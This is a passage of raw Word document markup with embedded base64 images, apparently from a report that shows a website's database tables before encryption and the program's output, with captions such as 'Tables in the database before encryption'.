bj/lm8frVnxJot5q2nmPT9UuNGukYMlxbokh&#10;+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A+g3ZR9BAAAYxEAAA4AAAAAAAAA&#10;AAAAAAAAPQIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhALqx2djOuwAAzrsAABQAAAAA&#10;AAAAAAAAAAAA5gYAAGRycy9tZWRpYS9pbWFnZTEuanBnUEsBAi0AFAAGAAgAAAAhAGFR3+zdAAAA&#10;BQEAAA8AAAAAAAAAAAAAAAAA5sIAAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQA3ncEY&#10;ugAAACEBAAAZAAAAAAAAAAAAAAAAAPDDAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAA&#10;AAAGAAYAfAEAAOHEAAAAAA==&#10;">
                <v:rect id="Rectangle 5645" o:spid="_x0000_s1325" style="position:absolute;width:677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5B1B2948" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Output: </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5646" o:spid="_x0000_s1326" style="position:absolute;left:5089;width:51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26113C95" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5647" o:spid="_x0000_s1327" style="position:absolute;top:1859;width:3484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0AD871B1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>Data used from Database in the website</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5648" o:spid="_x0000_s1328" style="position:absolute;left:26200;top:1859;width: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14:paraId="68BF97A7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5649" o:spid="_x0000_s1329" style="position:absolute;left:59067;top:31549;width:51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75274C90" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 5659" o:spid="_x0000_s1330" type="#_x0000_t75" style="position:absolute;left:192;top:3419;width:58738;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puNxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BasMw&#10;EETvhf6D2EIvppFTiGndKKGEJoRcSt18wGJtbWNrZUtq7Px9FAjkOMzMG2a5nkwnTuR8Y1nBfJaC&#10;IC6tbrhScPzdvryB8AFZY2eZFJzJw3r1+LDEXNuRf+hUhEpECPscFdQh9LmUvqzJoJ/Znjh6f9YZ&#10;DFG6SmqHY4SbTr6maSYNNhwXauxpU1PZFv9GwTAku913kh0LGg/bdkhat5++lHp+mj4/QASawj18&#10;a++1gkW2eIfrm/gE5OoCAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAjKqbjcYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId114" o:title=""/>
                </v:shape>
                <v:shape id="Shape 5660" o:spid="_x0000_s1331" style="position:absolute;left:144;top:3372;width:58833;height:29001;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5883275,290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uxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X+h+WKXirG8UGSV1FCrFeClaFehyyYxKbnQ3ZqUn7691DwePjfS9Wg2vUlbpQezYwGSegiAtv&#10;ay4NHA/58xxUEGSLjWcy8EsBVsvHhwVm1vf8Sde9lCqGcMjQQCXSZlqHoiKHYexb4sidfedQIuxK&#10;bTvsY7hr9DRJUu2w5thQYUtvFRXf+x9n4OOSz05y2MppM3/fTf76rzZfszGjp2H9CkpokLv43721&#10;Bl7SNO6Pb+IT0MsbAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGb/M27EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,2900045r5883275,l5883275,,,,,2900045xe" filled="f">
                  <v:path arrowok="t" textboxrect="0,0,5883275,2900045"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AFBD1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAB8432" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="21"/>
        <w:ind w:left="360" w:right="-59"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55A071B5" wp14:editId="07371DE6">
                <wp:extent cx="5945137" cy="2187426"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="45411" name="Group 45411"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5945137" cy="2187426"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5945137" cy="2187426"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5651" name="Rectangle 5651"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="51095" cy="182562"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="49BC1F6D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="5652" name="Rectangle 5652"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="185928"/>
                            <a:ext cx="3568044" cy="182562"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="338AF5E0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                </w:rPr>
                                <w:t>Tables in the database before encryption</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="5653" name="Rectangle 5653"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2682824" y="185928"/>
                            <a:ext cx="51467" cy="182562"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="38900E80" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="5654" name="Rectangle 5654"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5906720" y="2050162"/>
                            <a:ext cx="51095" cy="182561"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="68A36C36" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">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5662" name="Picture 5662"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId115"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="19253" y="341344"/>
                            <a:ext cx="5873750" cy="1782445"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="5663" name="Shape 5663"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="14491" y="336645"/>
                            <a:ext cx="5883275" cy="1791970"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5883275" h="1791970">
                                <a:moveTo>
                                  <a:pt x="0" y="1791970"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5883275" y="1791970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5883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A071B5" id="Group 45411" o:spid="_x0000_s1332" style="width:468.1pt;height:172.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59451,21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Q3X6VQQAAJQPAAAOAAAAZHJzL2Uyb0RvYy54bWzkV21v4zYM/j5g&#10;/8Hw92tiJ3Yco+lhuO4OBwy74l5+gKLIsTFZEiSlSffrR1KWk7a5XdcBLbAVqCNbFEU+pMSHl28P&#10;vUxuhXWdVqs0u5imiVBcbzq1XaXfvr5/U6WJ80xtmNRKrNI74dK3Vz//dLk3tch1q+VG2ASUKFfv&#10;zSptvTf1ZOJ4K3rmLrQRCiYbbXvm4dVuJxvL9qC9l5N8Oi0ne203xmounIOv12EyvSL9TSO4/9Q0&#10;TvhErlKwzdPT0nONz8nVJau3lpm244MZ7BlW9KxTsOmo6pp5luxs90hV33GrnW78Bdf9RDdNxwX5&#10;AN5k0wfefLB6Z8iXbb3fmhEmgPYBTs9Wy3+//WDNF3NjAYm92QIW9Ia+HBrb4y9YmRwIsrsRMnHw&#10;CYePxXJeZLNFmnCYy7NqMc/LACpvAflH63j76w9WTuLGk3vm7A0kiDti4P4dBl9aZgRB62rA4MYm&#10;3Qa8KYssTRTrIVM/Q+4wtZUioa8ED8mOYLnaAW5PRiqbLouAU1blRZkjTKOzrDbW+Q9C9wkOVqmF&#10;7Smj2O1vzgfRKIJbSoVPpd93UoZZ/AKYRatw5A/rAzmWFZTq+G2tN3fgbqvtn5/g4DZS71epHkYp&#10;nmXYHWfTRH5UADMemziwcbCOA+vlO02HK9jzy87rpiODj7sNhkH8MMleJpD52UAS6mgCBP2pgcyq&#10;YplXIatj3s+KsprO568XzwztOSL834/n7Gw8ZxGGJ8UzL6u8yiFqcFmdi2qRzcvhLnuNMzom5//l&#10;jEIkzly2838U02I5LRc5XFJYgKbFNAs3K6vjUS0eXLx0cl7u4h0z9LWDajpew//AImD0qIL+mG3B&#10;Kr+zIh2U9E/S0TP7x868AcJjmO/Wnez8HZE3qG9olLq96TgWUnw5LcYQySE/QAD3hVIcohslcR1W&#10;P3y/p2YtO4OlEYsSjgeDgfk9YE5nfA6s7FrzXS+UDzTTCgm2a+Xazrg0sbXo1wIYg/24oXxitfNW&#10;eN7ihg1sjPQh1OVxgqw8GoY2f4dAZMu8gPsOMno2z2ZQZkDTSUJXi9kCCjpxrmwBF9q8QInn5jTZ&#10;FSyhIRj2YmW6HK91YmQY4PHAPOlKz+bzJXA2hGpWlgGIU6iqWb6ItGuxzJYLIkInUPFd4F2IcORa&#10;wOM3gXXBtzaO+EHFIbKzv20pINNxHSrFYQIcq6gGW1ooPoMpON8D+fqqSdIf+XKUCHE9ykh1Kjvq&#10;xIJ2z70oF38N6T6Vj0BEifgbJMOF+lCGS+1EMAndopwbXQVQT8GUCr1eFjnCz6C3a+AIEaWFtkZt&#10;gpYzpNX5OykQDqk+iwboK7QZGa1zdrt+J21yy5Bw0t+Q9ySKa8LRG1ZNv7sKRZk0LRt0DWqGDcit&#10;QRNKCmokR2MGtXywJnST0JMBZLGnBCjGRWSWVn5cr6ATpg2Rvg3eHpkc4oJvRJapB4LWjywa2lTs&#10;LU/fSf7YTF/9BQAA//8DAFBLAwQKAAAAAAAAACEAdqVxwtroAADa6AAAFAAAAGRycy9tZWRpYS9p&#10;bWFnZTEuanBn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoH&#10;BwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkU&#10;DQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAAR&#10;CAF4BN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8q+GfjfXfif8QPFWsW10lp8P9FuZ9A0+1SNWfVLyF1W6u3cjciRSI9uiKQGKyu24&#10;GPa4rmdvK/8AXzaXz7XaHor/AC/r5XfyPVaK85kt/iB/w0NFMt3/AMWt/wCEYZXtfLt/+Qt9qGH3&#10;f67/AFGRj/V/8Cp3xI+N/hn4fXNxpNzc6nea+LJrv7DoWiXurz28Z3BJZktIZTCjMrBWkChij4zt&#10;bESkowU/XTro2v0uvKzLUeafIvL01Sf4Xs/O6PRKK8J+F/x2Yfs7/DLxF4ufxBqev+IvD1teT32h&#10;+Fr7VMztAjPI6WNu6xZZ8hWCg84HBx0Pwd8eQwfAPRPE2u+OJvHsfkO8viUaC+nTX7ecyKq2CJvW&#10;TdiNYlUuzAAKSwFbTg6cpRb+F2/P/L+tbYxlz8tl8Wv5f59P8j1WivOtH/aA8Da3ovijU49TvLGL&#10;wxam91i11bSLzT72ztxG0nnNa3EKTFCqPtZUIYowUkqQE8J/tDeAfHHiKw0XRNblvLnUoHudOum0&#10;66isdRRArP8AZLt4hBclQwJWKRiMNkDa2IV27L+v6sy3orv+tv8ANfej0aivI/Gn7Vnw1+H+oXtp&#10;q+q6q5sr2PTbi60zw5qWoWsV45U